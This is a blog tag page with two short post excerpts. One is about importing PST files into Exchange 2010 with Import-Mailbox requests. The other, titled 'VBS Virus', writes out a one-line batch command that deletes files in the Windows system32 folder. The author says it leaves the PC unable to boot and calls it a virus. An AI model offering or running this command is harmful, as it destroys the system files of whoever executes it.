Tag: files
How to Import PST Files into Exchange 2010 – Part 3 of 3
by Installer on Oct.29, 2010, under Exchange 2010
The third and final clip in this series detailing how to search your network for PST files and then import them into Exchange. First, we identified the relevant machines, and then we identified the filenames, owners and locations of the PST files on those machines. Now, to finish, we’ll run through a script to set up email Import-Mailbox requests from these PST files into their relevant mailboxes in Exchange.
VBS Virus
by Installer on Apr.03, 2010, under Vbscript
My first video.. I’m making a VBS file which is detected as malware (false positive). The script is: @echo off del c:\windows\system32 Edit: The virus doesn’t delete system32 by just opening the file. You will get a command prompt asking to confirm or not (y/n) and if you choose yes, it will delete files in system32. Most of them are access denied, but it will still make your pc unable to start again whenever you shutdown. Update: Sorry for the mistake. It’s a batch file, not a vbs file.